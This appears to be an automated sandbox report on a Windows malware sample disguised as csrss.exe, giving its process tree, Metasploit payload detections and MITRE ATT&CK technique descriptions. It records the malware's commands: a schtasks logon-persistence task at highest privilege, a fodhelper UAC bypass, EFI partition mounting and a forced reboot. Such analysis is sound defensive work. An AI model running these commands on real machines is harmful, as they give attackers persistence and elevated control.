Analysis Process: csrss.exe PID: 3192 Parent PID: 5300

General

Start time:	01:57:13
Start date:	11/11/2021
Path:	C:\Windows\rss\csrss.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\rss\csrss.exe /305-305
Imagebase:	0x400000
File size:	4520488 bytes
MD5 hash:	14C0D8425930CCEC0566B04864A05670
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000E.00000003.327032138.000000000638A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 39%, ReversingLabs

Analysis Process: csrss.exe PID: 1240 Parent PID: 3352

General

Start time:	01:57:20
Start date:	11/11/2021
Path:	C:\Windows\rss\csrss.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\rss\csrss.exe"
Imagebase:	0x7ff70d6e0000
File size:	4520488 bytes
MD5 hash:	14C0D8425930CCEC0566B04864A05670
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000010.00000003.333119737.000000000638A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp, Author: Joe Security

Analysis Process: svchost.exe PID: 6580 Parent PID: 572

General

Start time:	01:57:23
Start date:	11/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: schtasks.exe PID: 4036 Parent PID: 3192

General

Start time:	01:57:24
Start date:	11/11/2021
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Imagebase:	0x7ff7d1430000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 4004 Parent PID: 4036

General

Start time:	01:57:25
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: schtasks.exe PID: 7076 Parent PID: 3192

General

Start time:	01:57:25
Start date:	11/11/2021
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /delete /tn ScheduledUpdate /f
Imagebase:	0x7ff7d1430000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 7100 Parent PID: 7076

General

Start time:	01:57:25
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: csrss.exe PID: 7108 Parent PID: 664

General

Start time:	01:57:25
Start date:	11/11/2021
Path:	C:\Windows\rss\csrss.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\rss\csrss.exe
Imagebase:	0x400000
File size:	4520488 bytes
MD5 hash:	14C0D8425930CCEC0566B04864A05670
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000017.00000003.358520385.000000000638A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000017.00000002.393659101.0000000005700000.00000040.00000001.sdmp, Author: Joe Security

Analysis Process: mountvol.exe PID: 5656 Parent PID: 3192

General

Start time:	01:57:25
Start date:	11/11/2021
Path:	C:\Windows\SysWOW64\mountvol.exe
Wow64 process (32bit):	true
Commandline:	mountvol B: /s
Imagebase:	0x900000
File size:	15360 bytes
MD5 hash:	5C11B99E6D41403031CD946255E8A353
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 3012 Parent PID: 5656

General

Start time:	01:57:26
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 7140 Parent PID: 1240

General

Start time:	01:57:26
Start date:	11/11/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Sysnative\cmd.exe /C fodhelper
Imagebase:	0x7ff64bd60000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: mountvol.exe PID: 2224 Parent PID: 3192

General

Start time:	01:57:27
Start date:	11/11/2021
Path:	C:\Windows\SysWOW64\mountvol.exe
Wow64 process (32bit):	true
Commandline:	mountvol B: /d
Imagebase:	0x900000
File size:	15360 bytes
MD5 hash:	5C11B99E6D41403031CD946255E8A353
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 5580 Parent PID: 7140

General

Start time:	01:57:27
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: fodhelper.exe PID: 6256 Parent PID: 7140

General

Start time:	01:57:27
Start date:	11/11/2021
Path:	C:\Windows\System32\fodhelper.exe
Wow64 process (32bit):	false
Commandline:	fodhelper
Imagebase:	0x7ff7a9b10000
File size:	46080 bytes
MD5 hash:	1D1F9E564472A9698F1BE3F9FEB9864B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 5800 Parent PID: 2224

General

Start time:	01:57:27
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: fodhelper.exe PID: 5776 Parent PID: 7140

General

Start time:	01:57:28
Start date:	11/11/2021
Path:	C:\Windows\System32\fodhelper.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\fodhelper.exe"
Imagebase:	0x7ff7a9b10000
File size:	46080 bytes
MD5 hash:	1D1F9E564472A9698F1BE3F9FEB9864B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: mountvol.exe PID: 5784 Parent PID: 3192

General

Start time:	01:57:28
Start date:	11/11/2021
Path:	C:\Windows\SysWOW64\mountvol.exe
Wow64 process (32bit):	true
Commandline:	mountvol B: /s
Imagebase:	0x900000
File size:	15360 bytes
MD5 hash:	5C11B99E6D41403031CD946255E8A353
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: csrss.exe PID: 3016 Parent PID: 3352

General

Start time:	01:57:29
Start date:	11/11/2021
Path:	C:\Windows\rss\csrss.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\rss\csrss.exe"
Imagebase:	0x400000
File size:	4520488 bytes
MD5 hash:	14C0D8425930CCEC0566B04864A05670
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000022.00000003.354921763.000000000638A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000022.00000002.388262330.0000000005700000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000022.00000002.377614000.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

Analysis Process: conhost.exe PID: 1956 Parent PID: 5784

General

Start time:	01:57:29
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: mountvol.exe PID: 7104 Parent PID: 3192

General

Start time:	01:57:30
Start date:	11/11/2021
Path:	C:\Windows\SysWOW64\mountvol.exe
Wow64 process (32bit):	true
Commandline:	mountvol B: /d
Imagebase:	0x900000
File size:	15360 bytes
MD5 hash:	5C11B99E6D41403031CD946255E8A353
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: fodhelper.exe PID: 6016 Parent PID: 7140

General

Start time:	01:57:33
Start date:	11/11/2021
Path:	C:\Windows\System32\fodhelper.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\fodhelper.exe"
Imagebase:	0x7ff7a9b10000
File size:	46080 bytes
MD5 hash:	1D1F9E564472A9698F1BE3F9FEB9864B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 5108 Parent PID: 7104

General

Start time:	01:57:34
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: csrss.exe PID: 5360 Parent PID: 6016

General

Start time:	01:57:35
Start date:	11/11/2021
Path:	C:\Windows\rss\csrss.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\rss\csrss.exe"
Imagebase:	0x400000
File size:	4520488 bytes
MD5 hash:	14C0D8425930CCEC0566B04864A05670
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000002A.00000002.376433226.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000002A.00000003.364603703.000000000638A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000002A.00000002.387983179.0000000005700000.00000040.00000001.sdmp, Author: Joe Security

Analysis Process: shutdown.exe PID: 5384 Parent PID: 3192

General

Start time:	01:57:36
Start date:	11/11/2021
Path:	C:\Windows\SysWOW64\shutdown.exe
Wow64 process (32bit):	true
Commandline:	shutdown -r -t 5
Imagebase:	0xf0000
File size:	23552 bytes
MD5 hash:	E2EB9CC0FE26E28406FB6F82F8E81B26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6932 Parent PID: 5384

General

Start time:	01:57:37
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 4400 Parent PID: 3016

General

Start time:	01:57:37
Start date:	11/11/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Sysnative\cmd.exe /C fodhelper
Imagebase:	0x7ff64bd60000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 3212 Parent PID: 4400

General

Start time:	01:57:38
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: fodhelper.exe PID: 2528 Parent PID: 4400

General

Start time:	01:57:38
Start date:	11/11/2021
Path:	C:\Windows\System32\fodhelper.exe
Wow64 process (32bit):	false
Commandline:	fodhelper
Imagebase:	0x7ff7a9b10000
File size:	46080 bytes
MD5 hash:	1D1F9E564472A9698F1BE3F9FEB9864B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: fodhelper.exe PID: 3932 Parent PID: 4400

General

Start time:	01:57:39
Start date:	11/11/2021
Path:	C:\Windows\System32\fodhelper.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\fodhelper.exe"
Imagebase:	0x7ff7a9b10000
File size:	46080 bytes
MD5 hash:	1D1F9E564472A9698F1BE3F9FEB9864B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: csrss.exe PID: 916 Parent PID: 7108

General

Start time:	01:57:40
Start date:	11/11/2021
Path:	C:\Windows\rss\csrss.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\rss\csrss.exe
Imagebase:	0x400000
File size:	4520488 bytes
MD5 hash:	14C0D8425930CCEC0566B04864A05670
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000032.00000003.393407437.000000000638A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000032.00000002.398055163.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000032.00000002.402547208.0000000005700000.00000040.00000001.sdmp, Author: Joe Security

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 4t4y4r89UZ

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Persistence and Installation Behavior:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre